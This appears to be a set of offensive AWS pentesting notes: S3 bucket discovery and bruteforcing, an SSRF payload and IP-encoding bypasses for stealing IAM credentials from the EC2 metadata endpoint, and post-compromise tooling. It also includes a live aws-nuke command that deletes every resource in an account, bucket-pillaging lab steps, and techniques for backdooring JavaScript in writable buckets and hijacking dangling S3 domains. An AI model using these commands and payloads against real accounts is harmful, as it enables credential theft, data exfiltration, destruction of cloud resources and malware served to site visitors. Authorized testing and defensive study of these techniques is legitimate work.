
Auth methods:
- Programmatic access: an Access Key ID + Secret Access Key, used to authenticate from scripts and the AWS CLI
- Management Console access: web portal access to AWS

Recon:
- AWS usage
  - Some web applications pull content directly from S3 buckets
  - Check where web resources are loaded from to determine whether S3 buckets are being utilized
  - Burp Suite: navigate the application as you normally would, then check for any requests to:
    - https://[bucketname].s3.amazonaws.com
    - https://s3-[region].amazonaws.com/[OrgName]
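The Burp check above can be approximated offline with a regex pass over saved response bodies. A minimal sketch; the regex and function name are my own, not from any particular tool:

```python
import re

# Matches both virtual-hosted style (bucket.s3.amazonaws.com, with or
# without a region label) and path style (s3-region.amazonaws.com/bucket).
S3_URL_RE = re.compile(
    r"https?://(?:(?P<bucket>[a-z0-9.-]+)\.s3[.-](?:[a-z0-9-]+\.)?amazonaws\.com"
    r"|s3[.-](?P<region>[a-z0-9-]+)\.amazonaws\.com/(?P<path_bucket>[a-z0-9.-]+))"
)

def find_s3_references(body: str) -> list:
    """Return bucket names referenced in an HTTP response body."""
    hits = []
    for m in S3_URL_RE.finditer(body):
        hits.append(m.group("bucket") or m.group("path_bucket"))
    return hits
```

Feed it the raw HTML/JS of pages captured while browsing; any hit is a bucket name worth probing with the S3 commands below.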

S3:
- Amazon Simple Storage Service (S3)
  - Storage service that is "secure by default"
  - Configuration mistakes tend to unsecure buckets by making them publicly accessible
  - nslookup can help reveal the bucket's region
  - S3 URL formats:
    - https://[bucketname].s3.amazonaws.com
    - https://s3-[region].amazonaws.com/[OrgName]

```
aws s3 ls s3://bucket-name-here --region [region]
aws s3api get-bucket-acl --bucket bucket-name-here
aws s3 cp readme.txt s3://bucket-name-here --profile newuserprofile
```
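The two URL formats above can be generated for any candidate bucket/region pair; a trivial helper (names are mine) for building wordlists of URLs to probe:

```python
def s3_urls(bucket: str, region: str) -> dict:
    """Build the two common S3 URL styles for a candidate bucket name."""
    return {
        # virtual-hosted style: bucket name is part of the hostname
        "virtual_hosted": f"https://{bucket}.s3.amazonaws.com",
        # path style: bucket name follows the regional endpoint
        "path_style": f"https://s3-{region}.amazonaws.com/{bucket}",
    }
```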

EBS volumes:
- Elastic Block Store (EBS): AWS virtual hard disks
- Can have issues similar to S3, i.e. being publicly available
- Difficult to target a specific org, but widespread leaks can be found

EC2:
- Like virtual machines
- SSH key pairs are created at launch (Linux); RDP for Windows
- Security groups control open ports and allowed source IPs

AWS Instance Metadata URL:
- Cloud servers hosted on services like EC2 need a way to orient themselves because of how dynamic they are
- A "metadata" endpoint was created, hosted on the non-routable IP address 169.254.169.254
- Can contain AWS access/secret keys and IAM credentials
- Should only be reachable from the localhost
- Server compromise or SSRF vulnerabilities may allow remote attackers to reach it
- IAM credentials can be stored here:
  - http://169.254.169.254/latest/meta-data/iam/security-credentials/
- Can potentially be hit externally if a proxy service (like Nginx) is hosted in AWS:
  - `curl --proxy vulndomain.target.com:80 http://169.254.169.254/latest/meta-data/iam/security-credentials/ && echo`
- CapitalOne hack
  - The attacker exploited SSRF on an EC2 server and accessed the metadata URL to get IAM access keys, then used the keys to dump an S3 bucket containing 100 million individuals' data
- AWS EC2 Instance Metadata Service Version 2 (IMDSv2)
  - Released in November 2019; both v1 and v2 are available
  - Intended to defend the metadata service against SSRF and reverse-proxy vulns
  - Adds session auth to requests
  - First, a PUT request is sent and answered with a token
  - Then, that token can be used to query data

```
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
curl http://example.com/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role
```
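The same two-step IMDSv2 token dance can be scripted with only the stdlib. A minimal sketch (function names are mine; `fetch` only works from inside an EC2 instance you are authorized to test):

```python
import urllib.request

IMDS = "http://169.254.169.254"

def build_token_request(ttl: int = 21600) -> urllib.request.Request:
    """IMDSv2 step 1: a PUT to /latest/api/token returns a session token."""
    return urllib.request.Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl)},
    )

def build_metadata_request(token: str,
                           path: str = "/latest/meta-data/") -> urllib.request.Request:
    """IMDSv2 step 2: the token must accompany every metadata read."""
    return urllib.request.Request(
        f"{IMDS}{path}",
        headers={"X-aws-ec2-metadata-token": token},
    )

def fetch(req: urllib.request.Request) -> str:
    # Only resolves from inside EC2; raises URLError anywhere else.
    with urllib.request.urlopen(req, timeout=2) as resp:
        return resp.read().decode()
```

Usage on-instance would be `token = fetch(build_token_request())` followed by `fetch(build_metadata_request(token, "/latest/meta-data/iam/security-credentials/"))`.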

Post-compromise:
- What do our access keys give us access to?
- Check AIO tools to do some recon (WeirdAAL recon modules, Pacu privesc modules, ...)

```
http://169.254.169.254/latest/meta-data
http://169.254.169.254/latest/meta-data/iam/security-credentials/
```

aws-nuke - removes all AWS resources from an account

- Fill nuke-config.yml with the output of `aws sts get-caller-identity`:

  ```
  ./aws-nuke -c nuke-config.yml                # Dry run: lists what would be removed
  ```

- If it fails because there is no account alias created:

  ```
  aws iam create-account-alias --account-alias unique-name
  ./aws-nuke -c nuke-config.yml --no-dry-run   # Actually performs the delete operations
  ```
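A minimal nuke-config.yml sketch. The account IDs are placeholders (take the real one from the `Account` field of `aws sts get-caller-identity`), and key names have changed between aws-nuke versions, so check the project's README before running:

```yaml
regions:
  - us-east-1
  - global

account-blocklist:
  - "999999999999"      # placeholder: an account that must never be touched

accounts:
  "123456789012":       # placeholder: the Account from `aws sts get-caller-identity`
    filters: {}
```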

Cloud Nuke

cloud-nuke aws

Other bypasses

```
aws eks list-clusters | jq -rc '.clusters'
["example"]
aws eks update-kubeconfig --name example
kubectl get secrets
```

SSRF AWS bypasses to access the metadata endpoint:
- Converted decimal IP: http://2852039166/latest/meta-data/
- IPv6 compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/
- IPv6 expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/
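The encodings above can be reproduced (and extended to hex, etc.) with a few lines of stdlib Python; the function name is mine:

```python
import ipaddress

def ssrf_variants(ip: str) -> dict:
    """Alternate encodings of an IPv4 address that many URL parsers accept."""
    as_int = int(ipaddress.IPv4Address(ip))
    return {
        "decimal": str(as_int),      # e.g. http://2852039166/
        "hex": hex(as_int),          # e.g. http://0xa9fea9fe/
        # IPv4-mapped IPv6, compressed form
        "ipv6_mapped": f"[::ffff:{as_int >> 16:x}:{as_int & 0xffff:x}]",
    }
```

Running `ssrf_variants("169.254.169.254")` regenerates the decimal and compressed-IPv6 forms listed above.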

Interesting metadata instance URLs:

```
http://instance-data
http://169.254.169.254
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
```

FIND AWS IN A COMPANY DOMAIN

```
# Find subdomains
./sub.sh -s example.com
assetfinder example.com

## Bruteforcing
python3 dnsrecon.py -d example.com -D subdomains-top1mil-5000.txt -t brt

# Reverse DNS lookups
host subdomain.domain.com
host IP

# Bucket finders
python3 cloud_enum.py -k example.com
ruby lazys3.rb companyname
# https://github.com/bbb31/slurp
slurp domain -t example.com
```

AIO AWS TOOLS

WeirdAAL:

```
pip3 install -r requirements.txt
cp env.sample .env
vim .env          # add your access keys
python3 weirdAAL.py -l
```

Pacu:

```
bash install.sh
python3 pacu.py
import_keys --all
ls
```

Lots of scripts for different purposes; check GitHub.

IAM resources finder

smogcloud

Red team scripts for AWS

AWS Bloodhound

S3

```
aws s3 ls s3://
aws s3api list-buckets
aws s3 ls s3://bucket.com
aws s3 ls --recursive s3://bucket.com
aws s3 sync s3://bucketname s3-files-dir
aws s3 cp s3://bucket-name/
aws s3 cp/mv test-file.txt s3://bucket-name
aws s3 rm s3://bucket-name/test-file.txt
aws s3api get-bucket-acl --bucket bucket-name                # Check owner
aws s3api head-object --bucket bucket-name --key file.txt    # Check file metadata
```

FIND BUCKETS

Find buckets from a keyword or company name:

```
ruby lazys3.rb companyname
python3 cloud_enum.py -k companynameorkeyword
php s3-buckets-bruteforcer.php --bucket gwen001-test002
```

Public S3 buckets:

- https://buckets.grayhatwarfare.com
- https://github.com/eth0izzle/bucket-stream

```
festin mydomain.com
festin -f domains.txt
```

Google dork:

```
site:.s3.amazonaws.com "Company"
```

CHECK BUCKETS FOR FILES AND SUCH

```
alias flumberbuckets='sudo python3 PATH/flumberboozle/flumberbuckets/flumberbuckets.py -p'
echo "bucket" | flumberbuckets -si -
cat hosts.txt | flumberbuckets -si -
```

```
sudo python3 s3scanner.py sites.txt
sudo python ./s3scanner.py --include-closed --out-file found.txt --dump names.txt
```

```
python s3inspector.py
```

```
source /home/cloudhacker/tools/AWSBucketDump/bin/activate
touch s.txt
sed -i "s,$,-$bapname-awscloudsec,g" /home/cloudhacker/tools/AWSBucketDump/BucketNames.txt
python AWSBucketDump.py -D -l BucketNames.txt -g s.txt
```

```
python3 find_data.py -n bucketname -u
```

```
python3 aws_extender_cli.py -s S3 -b flaws.cloud
```

S3 EXAMPLE ATTACKS

S3 Bucket Pillaging

- GOAL: Locate Amazon S3 buckets and search them for interesting data
- In this lab you will attempt to identify a publicly accessible S3 bucket hosted by an organization. After identifying it, you will list its contents and download the files hosted there.

```
sudo apt-get install python3-pip
git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu
sudo bash install.sh
sudo aws configure
sudo python3 pacu.py
```

Pacu > import_keys --all

Search by domain

Pacu > run s3__bucket_finder -d glitchcloud

List files in bucket

Pacu > aws s3 ls s3://glitchcloud

Download files

Pacu > aws s3 sync s3://glitchcloud s3-files-dir

S3 Code Injection

- Backdoor JavaScript in S3 buckets used by webapps
- In March 2018, crypto-miner malware was found loading on MSN's homepage
- This was due to AOL's advertising platform having a writable S3 bucket, which was being served by MSN
- If a webapp loads content from a publicly writable S3 bucket, attackers can upload malicious JS that gets executed by visitors
- Can perform XSS-type attacks against webapp visitors
- Hook browsers with BeEF

Domain Hijacking

- Hijack an S3 domain by finding references in a webapp to S3 buckets that no longer exist
- Or subdomains whose CNAME records still point to a deleted S3 bucket
- When assessing webapps, look for 404s to *.s3.amazonaws.com
- When brute-forcing subdomains for an org, look for 404s with a 'NoSuchBucket' error
- Create an S3 bucket with the same name and region
- Load malicious content into the new bucket; it will be executed when visitors hit the site
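The 'NoSuchBucket' check above can be sketched as a small classifier. The helper names are mine; it only inspects responses you have already fetched (e.g. during a subdomain bruteforce), so it needs no network access:

```python
def takeover_candidate(status: int, body: str) -> bool:
    """A 404 whose body contains the S3 error code 'NoSuchBucket' means the
    bucket name is unclaimed and the pointing CNAME can be hijacked by
    creating a bucket with the same name. A 403/AccessDenied means the
    bucket exists and is NOT claimable."""
    return status == 404 and "NoSuchBucket" in body

def hijackable_hosts(responses: dict) -> list:
    """responses: hostname -> (status_code, response_body)."""
    return [host for host, (status, body) in responses.items()
            if takeover_candidate(status, body)]
```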

Amazon Inspector is an automated security assessment service that helps improve the security and compliance of applications deployed on AWS.